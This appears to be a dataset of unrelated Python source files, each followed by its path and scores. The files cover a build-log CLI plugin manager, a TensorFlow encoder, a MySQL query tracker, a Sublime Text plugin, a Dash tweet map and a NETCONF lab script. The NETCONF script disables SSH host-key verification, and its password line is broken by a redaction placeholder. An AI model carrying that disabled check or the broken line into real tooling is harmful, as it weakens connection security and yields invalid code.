def RegisterToolContains(self, cb, substring):
self.tool_contains.append((substring, cb))
def RegisterToolRegex(self, cb, regex):
self.tool_regexes.append((regex, cb)) | instmakelib/climanager.py | from instmakelib import instmake_log as LOG
from instmakelib import shellsyntax
from instmakelib import clibase
import sys
class CLIManager:
"""Manages the CLI plugins."""
def __init__(self, plugins=None):
# Load CLI plugins
if not plugins:
plugins = LOG.GetPlugins()
mods = plugins.LoadAllPlugins(LOG.CLI_PLUGIN_PREFIX)
# Containers for CLI plugins to register themselves to.
self.tool_contains = []
self.tool_regexes = []
# Key = 'name' from plugin, Value = plugin module
self.plugin_names = {}
for mod in mods:
mod.register(self)
self.plugin_names[mod.name] = mod
def PrintHelp(self):
names = self.plugin_names.keys()
names.sort()
for name in names:
mod = self.plugin_names[name]
print name, ":", mod.description
mod.usage()
def UserOption(self, user_option):
i = user_option.find(",")
if i < 1:
sys.exit("Invalid CLI plugin option: %s" % (user_option,))
plugin_name = user_option[:i]
option_text = user_option[i+1:]
options = option_text.split(",")
if not self.plugin_names.has_key(plugin_name):
sys.exit("No CLI plugin '%s'" % (plugin_name,))
mod = self.plugin_names[plugin_name]
for option in options:
mod.UserOption(option)
def _ParseCmdline(self, cmdline_string):
cmdline_args = shellsyntax.split_shell_cmdline(cmdline_string)
# XXX - We need to be able to handle "segmented" command-lines
# (using &&, ||, ;, and the redirection symbols). But we don't
# have a full-blown shell-cmdline parser. For now, we can help
# the cli plugins if we tidy things up a bit.
if cmdline_args:
# Remove any prefixed new-lines, which can come in from
# make-3.81
cmdline_args = [a.lstrip("\n") for a in cmdline_args]
# Look for a word that stars with `, like `gcc..... ...`
for i, arg in enumerate(cmdline_args):
if len(arg) > 1 and arg[0] == "`":
cmdline_args = cmdline_args[:i]
if ";" in cmdline_args:
i = cmdline_args.index(";")
cmdline_args = cmdline_args[:i]
if "||" in cmdline_args:
i = cmdline_args.index("||")
cmdline_args = cmdline_args[:i]
if "&&" in cmdline_args:
i = cmdline_args.index("&&")
cmdline_args = cmdline_args[:i]
# Trailing semicolon attached to a word
if cmdline_args[-1] == ";":
cmdline_args = cmdline_args[:-1]
# make-3.81 will put a trailing backslash ("\\n") in the cmdline,
# which shows up as \n; after the previous filter, it will now
# be an empty string, so remove that here.
cmdline_args = filter(lambda x: x != "", cmdline_args)
return cmdline_args
def ParseRecord(self, rec, cwd=None, pathfunc=None):
"""Find a Parser object that can parse the command-line in the
log record."""
cmdline_args = self._ParseCmdline(rec.cmdline)
# Check tool regexes
for (regex, cb) in self.tool_regexes:
if rec.tool != None and regex.search(rec.tool):
if cwd == None:
cwd = rec.cwd
try:
retval = cb(cmdline_args, cwd, pathfunc)
return retval
except clibase.NotHandledException:
return None
except clibase.BadCLIException, err:
print >> sys.stderr, "Error in PID %s" % (rec.pid,)
print >> sys.stderr, err
rec.Print(sys.stderr)
sys.exit(1)
# Check tool substrings
for (substring, cb) in self.tool_contains:
if rec.tool != None and rec.tool.find(substring) > -1:
if cwd == None:
cwd = rec.cwd
try:
retval = cb(cmdline_args, cwd, pathfunc)
return retval
except clibase.NotHandledException:
return None
except clibase.BadCLIException, err:
print >> sys.stderr, "Error in PID %s" % (rec.pid,)
print >> sys.stderr, err
rec.Print(sys.stderr)
sys.exit(1)
# Nothing matched. Return None for "no parser"
return None
# Methods a CLI plugin can call to register itself.
def RegisterToolContains(self, cb, substring):
self.tool_contains.append((substring, cb))
def RegisterToolRegex(self, cb, regex):
self.tool_regexes.append((regex, cb)) | 0.37605 | 0.07989 |
import tensorflow as tf
import numpy as np
from layers import *
from BN_layers import *
class Dilated_Block(object):
def __init__(self, prefix, is_training, filter_width, conv_in_channels, conv_out_channels, skip_channels, dilation, clust_size = None, use_skip = True):
self.use_dense = True
self.use_dropout = False
self.use_skip = use_skip
self.glu = True
self.clust_size = clust_size
self.x_filter = BN_Conv("%s_x_filter" %(prefix), is_training, filter_width, conv_in_channels, conv_out_channels, dilation = dilation)
if self.glu:
self.x_gate = BN_Conv("%s_x_gate" %(prefix), is_training, filter_width, conv_in_channels, conv_out_channels, dilation = dilation)
self.dense = BN_Conv_1x1("%s_dense" %(prefix), is_training, conv_out_channels, conv_out_channels)
if self.use_skip:
self.skip = BN_Conv_1x1("%s_skip" %(prefix), is_training, conv_out_channels, skip_channels)
def activated_on(self, x):
x_filter = self.x_filter.activated_on(x)
if self.glu:
x_gate = self.x_gate.activated_on(x)
if self.glu:
out = x_filter * tf.sigmoid(x_gate)
else:
out = tf.nn.relu(x_filter)
dense = self.dense.activated_on(out)
if self.use_skip:
skip = self.skip.activated_on(out)
else:
skip = None
return x + dense, skip
class Dilated_Encoder(object):
def __init__(self, name, is_training, batch_size, max_seq_len, channels, discrete_dims = 22, embedding_size = 32, do_embed = True, use_skip = False):
self.batch_size = batch_size
self.var_scope = name
self.max_seq_len = max_seq_len
self.is_training = is_training
self.positional_encoding = True
self.embedding_size = embedding_size
self.discrete_dims = discrete_dims
self.position_embedding_size = self.discrete_dims
self.do_embed = do_embed
self.use_skip = use_skip
self.residual_channels = channels
self.dilation_channels = channels
self.skip_channels = channels
self.filter_width = 3
self.dilations = [1, 3, 9, 27]
self.model_output_dim = self.skip_channels if self.use_skip else self.residual_channels
self.block_class = Dilated_Block
self.vars = self.create_variables()
def create_variables(self):
var = {}
with tf.variable_scope(self.var_scope):
with tf.variable_scope("wavenet_encoder"):
if self.do_embed:
initial_channels = self.embedding_size
var["seq_embed"] = Conv_1x1("seq_embed", self.discrete_dims, self.embedding_size)
else:
initial_channels = self.discrete_dims
if self.positional_encoding:
var["position_encoder"] = tf.get_variable("enc_position_encoder", [1, self.max_seq_len, self.position_embedding_size], tf.float32, tf.random_normal_initializer(0.0, 0.05))
var["position_1x1"] = Conv_1x1("pos_embed", self.position_embedding_size, initial_channels)
var["input_conv"] = BN_Conv("input_conv", self.is_training, 3, initial_channels, self.residual_channels, dilation = 1)
with tf.variable_scope("dilated_convolutions"):
var["dilated_convolutions"] = []
for (layer_index, dilation) in enumerate(self.dilations):
next_layer = self.block_class("encoding_wavenet_%i" %(layer_index), self.is_training, self.filter_width, self.residual_channels, self.dilation_channels, self.skip_channels, dilation = dilation, use_skip = self.use_skip)
var["dilated_convolutions"].append(next_layer)
return var
def run_conv(self, batch):
skip_outputs = []
if self.do_embed:
embedded_batch = self.vars["seq_embed"].activated_on(batch)
else:
embedded_batch = batch
if self.positional_encoding:
embedded_batch += self.vars["position_1x1"].activated_on(self.vars["position_encoder"])
cur_act = self.vars["input_conv"].activated_on(embedded_batch)
for layer in self.vars["dilated_convolutions"]:
cur_act, skip = layer.activated_on(cur_act)
skip_outputs.append(skip)
if self.use_skip:
return sum(skip_outputs), cur_act
else:
return None, cur_act
def activated_on(self, batch):
if self.use_skip:
net_out, _ = self.run_conv(batch)
else:
_, net_out = self.run_conv(batch)
return net_out | dilated_encoder.py | import tensorflow as tf
import numpy as np
from layers import *
from BN_layers import *
class Dilated_Block(object):
def __init__(self, prefix, is_training, filter_width, conv_in_channels, conv_out_channels, skip_channels, dilation, clust_size = None, use_skip = True):
self.use_dense = True
self.use_dropout = False
self.use_skip = use_skip
self.glu = True
self.clust_size = clust_size
self.x_filter = BN_Conv("%s_x_filter" %(prefix), is_training, filter_width, conv_in_channels, conv_out_channels, dilation = dilation)
if self.glu:
self.x_gate = BN_Conv("%s_x_gate" %(prefix), is_training, filter_width, conv_in_channels, conv_out_channels, dilation = dilation)
self.dense = BN_Conv_1x1("%s_dense" %(prefix), is_training, conv_out_channels, conv_out_channels)
if self.use_skip:
self.skip = BN_Conv_1x1("%s_skip" %(prefix), is_training, conv_out_channels, skip_channels)
def activated_on(self, x):
x_filter = self.x_filter.activated_on(x)
if self.glu:
x_gate = self.x_gate.activated_on(x)
if self.glu:
out = x_filter * tf.sigmoid(x_gate)
else:
out = tf.nn.relu(x_filter)
dense = self.dense.activated_on(out)
if self.use_skip:
skip = self.skip.activated_on(out)
else:
skip = None
return x + dense, skip
class Dilated_Encoder(object):
def __init__(self, name, is_training, batch_size, max_seq_len, channels, discrete_dims = 22, embedding_size = 32, do_embed = True, use_skip = False):
self.batch_size = batch_size
self.var_scope = name
self.max_seq_len = max_seq_len
self.is_training = is_training
self.positional_encoding = True
self.embedding_size = embedding_size
self.discrete_dims = discrete_dims
self.position_embedding_size = self.discrete_dims
self.do_embed = do_embed
self.use_skip = use_skip
self.residual_channels = channels
self.dilation_channels = channels
self.skip_channels = channels
self.filter_width = 3
self.dilations = [1, 3, 9, 27]
self.model_output_dim = self.skip_channels if self.use_skip else self.residual_channels
self.block_class = Dilated_Block
self.vars = self.create_variables()
def create_variables(self):
var = {}
with tf.variable_scope(self.var_scope):
with tf.variable_scope("wavenet_encoder"):
if self.do_embed:
initial_channels = self.embedding_size
var["seq_embed"] = Conv_1x1("seq_embed", self.discrete_dims, self.embedding_size)
else:
initial_channels = self.discrete_dims
if self.positional_encoding:
var["position_encoder"] = tf.get_variable("enc_position_encoder", [1, self.max_seq_len, self.position_embedding_size], tf.float32, tf.random_normal_initializer(0.0, 0.05))
var["position_1x1"] = Conv_1x1("pos_embed", self.position_embedding_size, initial_channels)
var["input_conv"] = BN_Conv("input_conv", self.is_training, 3, initial_channels, self.residual_channels, dilation = 1)
with tf.variable_scope("dilated_convolutions"):
var["dilated_convolutions"] = []
for (layer_index, dilation) in enumerate(self.dilations):
next_layer = self.block_class("encoding_wavenet_%i" %(layer_index), self.is_training, self.filter_width, self.residual_channels, self.dilation_channels, self.skip_channels, dilation = dilation, use_skip = self.use_skip)
var["dilated_convolutions"].append(next_layer)
return var
def run_conv(self, batch):
skip_outputs = []
if self.do_embed:
embedded_batch = self.vars["seq_embed"].activated_on(batch)
else:
embedded_batch = batch
if self.positional_encoding:
embedded_batch += self.vars["position_1x1"].activated_on(self.vars["position_encoder"])
cur_act = self.vars["input_conv"].activated_on(embedded_batch)
for layer in self.vars["dilated_convolutions"]:
cur_act, skip = layer.activated_on(cur_act)
skip_outputs.append(skip)
if self.use_skip:
return sum(skip_outputs), cur_act
else:
return None, cur_act
def activated_on(self, batch):
if self.use_skip:
net_out, _ = self.run_conv(batch)
else:
_, net_out = self.run_conv(batch)
return net_out | 0.705075 | 0.165627 |
import sys
import os
import time
from datetime import datetime
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, Integer, Float, String, DateTime, PickleType
from sqlalchemy.orm import sessionmaker
from sqlalchemy import text
sys.path.append(os.path.dirname(os.path.abspath(__file__))+"/../../")
from RTXConfiguration import RTXConfiguration
Base = declarative_base()
class ARAXQuery(Base):
__tablename__ = 'arax_query'
query_id = Column(Integer, primary_key=True)
status = Column(String(50), nullable=False)
start_datetime = Column(String(19), nullable=False) ## ISO formatted YYYY-MM-DD HH:mm:ss
end_datetime = Column(String(19), nullable=True) ## ISO formatted YYYY-MM-DD HH:mm:ss
elapsed = Column(Float, nullable=True) ## seconds
pid = Column(Integer, nullable=False)
instance_name = Column(String(50), nullable=False)
origin = Column(String(50), nullable=False)
input_query = Column(PickleType, nullable=False) ## blob object
message_id = Column(Integer, nullable=True)
message_code = Column(String(50), nullable=True)
code_description = Column(String(50), nullable=True)
remote_address = Column(String(50), nullable=False)
class ARAXQueryTracker:
def __init__(self):
self.session = ""
self.databaseName = "RTXFeedback"
self.connect()
def __del__(self):
self.disconnect()
def create_tables(self):
Base.metadata.drop_all(self.engine)
Base.metadata.create_all(self.engine)
def connect(self):
rtxConfig = RTXConfiguration()
engine = create_engine("mysql+pymysql://" + rtxConfig.mysql_feedback_username + ":" + rtxConfig.mysql_feedback_password + "@" + rtxConfig.mysql_feedback_host + "/" + self.databaseName)
DBSession = sessionmaker(bind=engine)
session = DBSession()
self.session = session
self.engine = engine
if not engine.dialect.has_table(engine, 'arax_query'):
self.create_tables()
def disconnect(self):
session = self.session
engine = self.engine
session.close()
try:
engine.dispose()
except:
pass
def update_tracker_entry(self, tracker_id, attributes):
session = self.session
tracker_entries = session.query(ARAXQuery).filter(ARAXQuery.query_id==tracker_id).all()
if len(tracker_entries) > 0:
tracker_entry = tracker_entries[0]
end_datetime = datetime.now()
elapsed = end_datetime - datetime.fromisoformat(tracker_entry.start_datetime)
tracker_entry.end_datetime = end_datetime.isoformat(' ', 'seconds')
tracker_entry.elapsed = elapsed.seconds
tracker_entry.status = attributes['status']
tracker_entry.message_id = attributes['message_id']
tracker_entry.message_code = attributes['message_code']
tracker_entry.code_description = attributes['code_description']
session.commit()
def create_tracker_entry(self, attributes):
session = self.session
tracker_entry = ARAXQuery(status="started",
start_datetime=datetime.now().isoformat(' ', 'seconds'),
pid=os.getpid(),
instance_name="test",
origin=attributes['origin'],
input_query=attributes['input_query'],
remote_address=attributes['remote_address'])
session.add(tracker_entry)
session.commit()
tracker_id = tracker_entry.query_id
return tracker_id
def get_entries(self, last_N_hours=24, incomplete_only=False):
if incomplete_only:
return self.session.query(ARAXQuery).filter(
text("""status NOT LIKE '%Completed%'
AND TIMESTAMPDIFF(HOUR, STR_TO_DATE(start_datetime, '%Y-%m-%d %T'), NOW()) < :n""")).params(n=last_N_hours).all()
else:
return self.session.query(ARAXQuery).filter(
text("""TIMESTAMPDIFF(HOUR, STR_TO_DATE(start_datetime, '%Y-%m-%d %T'), NOW()) < :n""")).params(n=last_N_hours).all()
def main():
query_tracker = ARAXQueryTracker()
attributes = { 'origin': 'local_dev', 'input_query': { 'query_graph': { 'nodes': [], 'edges': [] } }, 'remote_address': 'test_address' }
tracker_id = query_tracker.create_tracker_entry(attributes)
time.sleep(2)
attributes = { 'status': 'Completed OK', 'message_id': 3187, 'message_code': 'OK', 'code_description': '32 results' }
query_tracker.update_tracker_entry(tracker_id, attributes)
entries = query_tracker.get_entries()
for entry in entries:
print(entry.__dict__)
if __name__ == "__main__":
main() | code/ARAX/ARAXQuery/ARAX_query_tracker.py |
import sys
import os
import time
from datetime import datetime
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, Integer, Float, String, DateTime, PickleType
from sqlalchemy.orm import sessionmaker
from sqlalchemy import text
sys.path.append(os.path.dirname(os.path.abspath(__file__))+"/../../")
from RTXConfiguration import RTXConfiguration
Base = declarative_base()
class ARAXQuery(Base):
__tablename__ = 'arax_query'
query_id = Column(Integer, primary_key=True)
status = Column(String(50), nullable=False)
start_datetime = Column(String(19), nullable=False) ## ISO formatted YYYY-MM-DD HH:mm:ss
end_datetime = Column(String(19), nullable=True) ## ISO formatted YYYY-MM-DD HH:mm:ss
elapsed = Column(Float, nullable=True) ## seconds
pid = Column(Integer, nullable=False)
instance_name = Column(String(50), nullable=False)
origin = Column(String(50), nullable=False)
input_query = Column(PickleType, nullable=False) ## blob object
message_id = Column(Integer, nullable=True)
message_code = Column(String(50), nullable=True)
code_description = Column(String(50), nullable=True)
remote_address = Column(String(50), nullable=False)
class ARAXQueryTracker:
def __init__(self):
self.session = ""
self.databaseName = "RTXFeedback"
self.connect()
def __del__(self):
self.disconnect()
def create_tables(self):
Base.metadata.drop_all(self.engine)
Base.metadata.create_all(self.engine)
def connect(self):
rtxConfig = RTXConfiguration()
engine = create_engine("mysql+pymysql://" + rtxConfig.mysql_feedback_username + ":" + rtxConfig.mysql_feedback_password + "@" + rtxConfig.mysql_feedback_host + "/" + self.databaseName)
DBSession = sessionmaker(bind=engine)
session = DBSession()
self.session = session
self.engine = engine
if not engine.dialect.has_table(engine, 'arax_query'):
self.create_tables()
def disconnect(self):
session = self.session
engine = self.engine
session.close()
try:
engine.dispose()
except:
pass
def update_tracker_entry(self, tracker_id, attributes):
session = self.session
tracker_entries = session.query(ARAXQuery).filter(ARAXQuery.query_id==tracker_id).all()
if len(tracker_entries) > 0:
tracker_entry = tracker_entries[0]
end_datetime = datetime.now()
elapsed = end_datetime - datetime.fromisoformat(tracker_entry.start_datetime)
tracker_entry.end_datetime = end_datetime.isoformat(' ', 'seconds')
tracker_entry.elapsed = elapsed.seconds
tracker_entry.status = attributes['status']
tracker_entry.message_id = attributes['message_id']
tracker_entry.message_code = attributes['message_code']
tracker_entry.code_description = attributes['code_description']
session.commit()
def create_tracker_entry(self, attributes):
session = self.session
tracker_entry = ARAXQuery(status="started",
start_datetime=datetime.now().isoformat(' ', 'seconds'),
pid=os.getpid(),
instance_name="test",
origin=attributes['origin'],
input_query=attributes['input_query'],
remote_address=attributes['remote_address'])
session.add(tracker_entry)
session.commit()
tracker_id = tracker_entry.query_id
return tracker_id
def get_entries(self, last_N_hours=24, incomplete_only=False):
if incomplete_only:
return self.session.query(ARAXQuery).filter(
text("""status NOT LIKE '%Completed%'
AND TIMESTAMPDIFF(HOUR, STR_TO_DATE(start_datetime, '%Y-%m-%d %T'), NOW()) < :n""")).params(n=last_N_hours).all()
else:
return self.session.query(ARAXQuery).filter(
text("""TIMESTAMPDIFF(HOUR, STR_TO_DATE(start_datetime, '%Y-%m-%d %T'), NOW()) < :n""")).params(n=last_N_hours).all()
def main():
query_tracker = ARAXQueryTracker()
attributes = { 'origin': 'local_dev', 'input_query': { 'query_graph': { 'nodes': [], 'edges': [] } }, 'remote_address': 'test_address' }
tracker_id = query_tracker.create_tracker_entry(attributes)
time.sleep(2)
attributes = { 'status': 'Completed OK', 'message_id': 3187, 'message_code': 'OK', 'code_description': '32 results' }
query_tracker.update_tracker_entry(tracker_id, attributes)
entries = query_tracker.get_entries()
for entry in entries:
print(entry.__dict__)
if __name__ == "__main__":
main() | 0.295128 | 0.094052 |
import sublime, sublime_plugin
gte_st3 = int(sublime.version()) >= 3000
if gte_st3:
from .config import *
else:
from config import *
class HiveAddContextUrlBaseCommand(sublime_plugin.TextCommand):
def run(self, edit, event=None):
conf = sublime.load_settings(CONFIG_BASE_NAME)
url = self.find_url(event)
index = self.index_in_list(url, conf)
if index == -1:
self.add_to_list(url, conf)
sublime.status_message('URL `%s` has been added to open list.' % url)
else:
self.remove_from_list(index, conf)
sublime.status_message('URL `%s` has been removed from open list.' % url)
def is_visible(self, event=None):
return self.find_url(event) is not None
def description(self, event=None):
url = self.find_url(event)
if self.index_in_list(url) == -1:
return 'Add URL to Open List'
else:
return 'Remove URL from Open List'
def index_in_list(self, url, conf=None):
if conf == None:
conf = sublime.load_settings(CONFIG_BASE_NAME)
url_list = [item[0] for item in conf.get('urls', [])]
return url_list.index(url) if url in url_list else -1
def add_to_list(self, url, conf):
url_list = conf.get('urls', [])
url_list.append([url, ''])
conf.set('urls', url_list)
sublime.save_settings(CONFIG_BASE_NAME)
def remove_from_list(self, index, conf):
url_list = conf.get('urls', [])
url_list.pop(index)
conf.set('urls', url_list)
sublime.save_settings(CONFIG_BASE_NAME)
def find_url(self, pt):
line = self.view.line(pt)
a, b = [max(line.a, pt - 1024), min(line.b, pt + 1024)]
line = sublime.Region(a, b)
text = self.view.substr(line)
it = REX_URL.finditer(text)
for match in it:
if match.start() <= (pt - line.a) and match.end() >= (pt - line.a):
url = text[match.start():match.end()]
return url
return None
if gte_st3:
class HiveAddContextUrlCommand(HiveAddContextUrlBaseCommand):
def find_url(self, event):
pt = self.view.window_to_text((event['x'], event['y']))
return super(HiveAddContextUrlCommand, self).find_url(pt)
def want_event(self):
return True
else:
class HiveAddContextUrlCommand(HiveAddContextUrlBaseCommand):
def find_url(self, event):
selection = self.view.sel()
if not len(selection): return None
pt = selection[-1].b
return super(HiveAddContextUrlCommand, self).find_url(pt) | add_context_url.py | import sublime, sublime_plugin
gte_st3 = int(sublime.version()) >= 3000
if gte_st3:
from .config import *
else:
from config import *
class HiveAddContextUrlBaseCommand(sublime_plugin.TextCommand):
def run(self, edit, event=None):
conf = sublime.load_settings(CONFIG_BASE_NAME)
url = self.find_url(event)
index = self.index_in_list(url, conf)
if index == -1:
self.add_to_list(url, conf)
sublime.status_message('URL `%s` has been added to open list.' % url)
else:
self.remove_from_list(index, conf)
sublime.status_message('URL `%s` has been removed from open list.' % url)
def is_visible(self, event=None):
return self.find_url(event) is not None
def description(self, event=None):
url = self.find_url(event)
if self.index_in_list(url) == -1:
return 'Add URL to Open List'
else:
return 'Remove URL from Open List'
def index_in_list(self, url, conf=None):
if conf == None:
conf = sublime.load_settings(CONFIG_BASE_NAME)
url_list = [item[0] for item in conf.get('urls', [])]
return url_list.index(url) if url in url_list else -1
def add_to_list(self, url, conf):
url_list = conf.get('urls', [])
url_list.append([url, ''])
conf.set('urls', url_list)
sublime.save_settings(CONFIG_BASE_NAME)
def remove_from_list(self, index, conf):
url_list = conf.get('urls', [])
url_list.pop(index)
conf.set('urls', url_list)
sublime.save_settings(CONFIG_BASE_NAME)
def find_url(self, pt):
line = self.view.line(pt)
a, b = [max(line.a, pt - 1024), min(line.b, pt + 1024)]
line = sublime.Region(a, b)
text = self.view.substr(line)
it = REX_URL.finditer(text)
for match in it:
if match.start() <= (pt - line.a) and match.end() >= (pt - line.a):
url = text[match.start():match.end()]
return url
return None
if gte_st3:
class HiveAddContextUrlCommand(HiveAddContextUrlBaseCommand):
def find_url(self, event):
pt = self.view.window_to_text((event['x'], event['y']))
return super(HiveAddContextUrlCommand, self).find_url(pt)
def want_event(self):
return True
else:
class HiveAddContextUrlCommand(HiveAddContextUrlBaseCommand):
def find_url(self, event):
selection = self.view.sel()
if not len(selection): return None
pt = selection[-1].b
return super(HiveAddContextUrlCommand, self).find_url(pt) | 0.361728 | 0.09709 |
import dash
import dash_html_components as html
import dash_core_components as dcc
import plotly
import plotly.graph_objs as go
from WatchDogs_MongoWrapper import MongoWrapper
from dash.dependencies import Input, Output
import pandas as pd
df = pd.read_csv('/Users/iankresyman/Desktop/2011_february_us_airport_traffic2.csv')
df.head()
df['text'] = df['airport'] + '' + df['city'] + ', ' + df['state'] + '' + 'Arrivals: ' + df['cnt'].astype(str)
scl = [ [0,"rgb(39,174,96)"],[0.35,"rgb(46,204,113)"],[0.5,"rgb(241,196,15)"],\
[0.6,"rgb(243,156,18)"],[0.7,"rgb(231,76,60)"],[1,"rgb(192,57,43)"] ]
mongo = MongoWrapper()
negCoord, neuCoord, posCoord = mongo.get_lat_long('Facebook')
getTweets = mongo.get_tweets_with_lat_long('Facebook')
allLatitude = getTweets['Latitude']
allLongitude = getTweets['Longitude']
allSentiment = getTweets['Sentiment_Value']
print('\n')
# print(negCoord[0])
# df1 = pd.DataFrame()
# df2 = pd.DataFrame()
# df3 = pd.DataFrame()
# df4 = pd.DataFrame()
# df5 = pd.DataFrame()
# df6 = pd.DataFrame()
# print(mongo.get_tweets_with_lat_long('Facebook'))
# df1['negLat'] = negCoord[0]
# df2['negLong'] = negCoord[1]
# df3['posLat'] = posCoord[0]
# df4['posLong'] = posCoord[1]
# df5['neuLat'] = neuCoord[0]
# df6['neuLong'] = neuCoord[1]
print('\n')
# merge = pd.merge(df1,df3,on='latty', how='inner')
# print(merge)
# print(df5['neuLat'])
# print(df6['neuLong'])
# print(df1['latty'])
print('\n')
# print(df[negCoord[0]])
# print('\n')
# print(df['long'])
print('\n')
app = dash.Dash()
app.layout = html.Div(children=[
dcc.Graph(
style={'height': '800px'},
figure={
'data' :[{
'type':'scattergeo',
'locationmode':'USA-states',
'lon' : allLongitude,
'lat' : allLatitude,
'text' : allSentiment,
'mode':'markers',
'marker':{
'size':8,
'opacity':0.8,
'reversescale':True,
'autocolorscale':False,
'symbol':'circle',
'line':{
'width':1,
'color':'rgba(102, 102, 102)'
},
'colorscale' : scl,
'cmin' : -1,
'color' : allSentiment,
'cmax' : 1,
'colorbar':{
'title':"Polarity Scale"
}
}
}],
'layout' :{
'title':{
'text': 'Tweet locations with sentiment ratings',
},
'font':{
'size':15,
},
'geo' :{
# 'scope':'usa',
# 'projection':dict( 'type'='albers usa' ),
'showland' : True,
'landcolor' : "rgb(250, 250, 250)",
'subunitcolor' : "rgb(217, 217, 217)",
'countrycolor' : "rgb(217, 217, 217)",
'countrywidth' : 0.5,
'subunitwidth' : 0.5
},
}
}
)
])
if __name__ == '__main__':
app.run_server(debug=True) | WatchDogs_Visualisation/oldApps/tweet-map/testmap.py | import dash
import dash_html_components as html
import dash_core_components as dcc
import plotly
import plotly.graph_objs as go
from WatchDogs_MongoWrapper import MongoWrapper
from dash.dependencies import Input, Output
import pandas as pd
df = pd.read_csv('/Users/iankresyman/Desktop/2011_february_us_airport_traffic2.csv')
df.head()
df['text'] = df['airport'] + '' + df['city'] + ', ' + df['state'] + '' + 'Arrivals: ' + df['cnt'].astype(str)
scl = [ [0,"rgb(39,174,96)"],[0.35,"rgb(46,204,113)"],[0.5,"rgb(241,196,15)"],\
[0.6,"rgb(243,156,18)"],[0.7,"rgb(231,76,60)"],[1,"rgb(192,57,43)"] ]
mongo = MongoWrapper()
negCoord, neuCoord, posCoord = mongo.get_lat_long('Facebook')
getTweets = mongo.get_tweets_with_lat_long('Facebook')
allLatitude = getTweets['Latitude']
allLongitude = getTweets['Longitude']
allSentiment = getTweets['Sentiment_Value']
print('\n')
# print(negCoord[0])
# df1 = pd.DataFrame()
# df2 = pd.DataFrame()
# df3 = pd.DataFrame()
# df4 = pd.DataFrame()
# df5 = pd.DataFrame()
# df6 = pd.DataFrame()
# print(mongo.get_tweets_with_lat_long('Facebook'))
# df1['negLat'] = negCoord[0]
# df2['negLong'] = negCoord[1]
# df3['posLat'] = posCoord[0]
# df4['posLong'] = posCoord[1]
# df5['neuLat'] = neuCoord[0]
# df6['neuLong'] = neuCoord[1]
print('\n')
# merge = pd.merge(df1,df3,on='latty', how='inner')
# print(merge)
# print(df5['neuLat'])
# print(df6['neuLong'])
# print(df1['latty'])
print('\n')
# print(df[negCoord[0]])
# print('\n')
# print(df['long'])
print('\n')
app = dash.Dash()
app.layout = html.Div(children=[
dcc.Graph(
style={'height': '800px'},
figure={
'data' :[{
'type':'scattergeo',
'locationmode':'USA-states',
'lon' : allLongitude,
'lat' : allLatitude,
'text' : allSentiment,
'mode':'markers',
'marker':{
'size':8,
'opacity':0.8,
'reversescale':True,
'autocolorscale':False,
'symbol':'circle',
'line':{
'width':1,
'color':'rgba(102, 102, 102)'
},
'colorscale' : scl,
'cmin' : -1,
'color' : allSentiment,
'cmax' : 1,
'colorbar':{
'title':"Polarity Scale"
}
}
}],
'layout' :{
'title':{
'text': 'Tweet locations with sentiment ratings',
},
'font':{
'size':15,
},
'geo' :{
# 'scope':'usa',
# 'projection':dict( 'type'='albers usa' ),
'showland' : True,
'landcolor' : "rgb(250, 250, 250)",
'subunitcolor' : "rgb(217, 217, 217)",
'countrycolor' : "rgb(217, 217, 217)",
'countrywidth' : 0.5,
'subunitwidth' : 0.5
},
}
}
)
])
if __name__ == '__main__':
app.run_server(debug=True) | 0.114963 | 0.118487 |
from ncclient import manager
import yaml
import xml.dom.minidom
import lxml.etree as et
import xmltodict
payload = """
<filter>
<device-hardware-data xmlns="http://cisco.com/ns/yang/Cisco-IOS-XE-device-hardware-oper">
<device-hardware>
<device-inventory>
<serial-number/>
<hw-type/>
<hw-dev-index/>
</device-inventory>
</device-hardware>
</device-hardware-data>
</filter>
"""
# Getting the device information from the .yaml file
with open("devices.yaml", 'r') as devices:
xe_sandbox = yaml.safe_load(devices)["xe_sandbox"]
# Using ncclient to get the running-config of the device, as xml
with manager.connect(host=xe_sandbox["host"], port=xe_sandbox["port"],
username=xe_sandbox["username"], password=<PASSWORD>["password"], hostkey_verify=False) as m:
# getting the response. Converting to xml using the .data_xml attribute.
# Using the xml.dom.minidom library to pretty print the configuration
response_xml = xml.dom.minidom.parseString(m.get(payload).data_xml)
# Showing the full xml output
print("Response =\n{response}".format(response=response_xml.toprettyxml()))
# print(type(m.get(payload))) => returns a <class 'ncclient.operations.retrieve.GetReply'>
# print(type(m.get(payload).data_xml)) => returns a <class 'str'>
# print(type(response_xml)) => returns <class 'xml.dom.minidom.Document'>
# Just getting what we need
# First, converting the xml as a dict
response_dict = xmltodict.parse(response_xml.toxml())["data"]["device-hardware-data"]["device-hardware"]["device-inventory"]
print(dir(m))
# Printing each hw_type with its serial_number
for element in range(response_dict.__len__()):
for key, value in response_dict[element].items():
if key == "hw-type":
hw_type = value
if key == "serial-number":
serial_number = value
print("{hw} has SN : {sn}".format(hw=hw_type, sn=serial_number)) | advanced-netconf-explorer/solutions/1_ncclient_mission_serial_number/run.py | from ncclient import manager
import yaml
import xml.dom.minidom
import lxml.etree as et
import xmltodict
payload = """
<filter>
<device-hardware-data xmlns="http://cisco.com/ns/yang/Cisco-IOS-XE-device-hardware-oper">
<device-hardware>
<device-inventory>
<serial-number/>
<hw-type/>
<hw-dev-index/>
</device-inventory>
</device-hardware>
</device-hardware-data>
</filter>
"""
# Getting the device information from the .yaml file
with open("devices.yaml", 'r') as devices:
xe_sandbox = yaml.safe_load(devices)["xe_sandbox"]
# Using ncclient to get the running-config of the device, as xml
with manager.connect(host=xe_sandbox["host"], port=xe_sandbox["port"],
username=xe_sandbox["username"], password=<PASSWORD>["password"], hostkey_verify=False) as m:
# getting the response. Converting to xml using the .data_xml attribute.
# Using the xml.dom.minidom library to pretty print the configuration
response_xml = xml.dom.minidom.parseString(m.get(payload).data_xml)
# Showing the full xml output
print("Response =\n{response}".format(response=response_xml.toprettyxml()))
# print(type(m.get(payload))) => returns a <class 'ncclient.operations.retrieve.GetReply'>
# print(type(m.get(payload).data_xml)) => returns a <class 'str'>
# print(type(response_xml)) => returns <class 'xml.dom.minidom.Document'>
# Just getting what we need
# First, converting the xml as a dict
response_dict = xmltodict.parse(response_xml.toxml())["data"]["device-hardware-data"]["device-hardware"]["device-inventory"]
print(dir(m))
# Printing each hw_type with its serial_number
for element in range(response_dict.__len__()):
for key, value in response_dict[element].items():
if key == "hw-type":
hw_type = value
if key == "serial-number":
serial_number = value
